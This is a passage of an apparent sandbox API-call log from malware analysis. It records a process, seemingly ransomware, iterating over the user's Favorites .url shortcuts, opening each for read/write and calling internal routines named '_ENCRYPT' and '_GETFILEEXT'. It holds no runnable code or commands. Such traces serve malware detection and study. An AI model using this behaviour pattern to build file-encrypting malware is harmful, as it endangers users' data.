lpMsg=0x6aefc4) returned 0 [0037.149] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.149] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.149] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.149] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.149] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.149] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.149] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.149] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.149] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.149] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.150] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.150] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.150] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.150] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.150] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.150] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.150] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.150] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.150] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.151] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.151] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.151] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 0x7c20c0 [0037.151] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.151] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 0x7c20c0 [0037.151] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.151] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.152] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.152] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.152] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.152] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.152] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.152] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.152] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.152] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.152] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.152] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.152] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.152] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.152] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.152] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.153] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.153] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.153] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.153] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.153] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.153] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.153] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.153] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.153] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.153] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 0x7c20c0 [0037.153] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.154] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 0x7c20c0 [0037.154] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.154] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.154] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.154] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.154] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.154] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.154] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.154] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.154] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.154] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.154] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.154] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.156] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.156] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.156] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.156] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.156] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.156] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.156] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.156] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.156] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.156] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.156] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.156] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.156] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.156] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.156] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0x7c20c0 [0037.157] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0x7c20c0 [0037.157] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.157] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.157] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.157] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.157] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.157] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.157] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.157] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.157] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.158] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.158] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.159] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.159] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.159] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.159] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.159] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.159] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.159] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.159] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.159] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.159] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.159] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 0x7c20c0 [0037.160] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.160] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 0x7c20c0 [0037.160] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.160] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.160] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.160] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.160] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.160] CharUpperBuffW (in: 